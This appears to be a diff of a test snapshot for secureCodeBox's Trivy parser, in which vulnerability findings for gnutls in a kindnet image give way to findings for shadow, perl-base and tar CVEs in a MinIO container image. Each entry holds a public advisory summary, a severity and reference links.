"installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20232", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20232", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", + ], + }, + "category": "Vulnerability", + "description": "CPAN 2.28 allows Signature Verification Bypass.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-24659", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - "https://access.redhat.com/security/cve/CVE-2020-24659", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", - "https://gitlab.com/gnutls/gnutls/-/issues/1071", - "https://linux.oracle.com/cve/CVE-2020-24659.html", - "https://linux.oracle.com/errata/ELSA-2020-5483.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", - "https://security.gentoo.org/glsa/202009-01", - "https://security.netapp.com/advisory/ntap-20200911-0006/", - "https://ubuntu.com/security/notices/USN-4491-1", - "https://usn.ubuntu.com/4491-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-24659", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-24659", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-24659", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202009-01", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4491-1", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4491-1/", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2509", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6854", - "https://access.redhat.com/security/cve/CVE-2022-2509", - "https://bugzilla.redhat.com/2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - "https://errata.almalinux.org/9/ALSA-2022-6854.html", - "https://errata.rockylinux.org/RLSA-2022:6854", - "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", - "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", - "https://linux.oracle.com/cve/CVE-2022-2509.html", - "https://linux.oracle.com/errata/ELSA-2022-7105.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", - "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2509", - "https://www.debian.org/security/2022/dsa-5203", + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", ], }, "category": "Vulnerability", - "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Double free during gnutls_pkcs7_verify", + "name": "perl: File::Temp insecure temporary file handling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2509", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6854", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2509", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2108977", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6854", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + ], + }, + "category": "Vulnerability", + "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "references": [ { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5203", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u10", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0361", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "https://access.redhat.com/errata/RHSA-2023:1141", - "https://access.redhat.com/security/cve/CVE-2023-0361", - "https://bugzilla.redhat.com/2162596", - "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", - "https://errata.almalinux.org/9/ALSA-2023-1141.html", - "https://errata.rockylinux.org/RLSA-2023:1569", - "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", - "https://gitlab.com/gnutls/gnutls/-/issues/1050", - "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", - "https://linux.oracle.com/cve/CVE-2023-0361.html", - "https://linux.oracle.com/errata/ELSA-2023-1569.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", - "https://security.netapp.com/advisory/ntap-20230324-0005/", - "https://ubuntu.com/security/notices/USN-5901-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", ], }, "category": "Vulnerability", - "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "timing side-channel in the TLS RSA key exchange code", + "name": "tar: does not properly warn the user when extracting setuid or setgid files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0361", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:1141", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0361", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2162596", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", + ], + }, + "category": "Vulnerability", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "references": [ + { 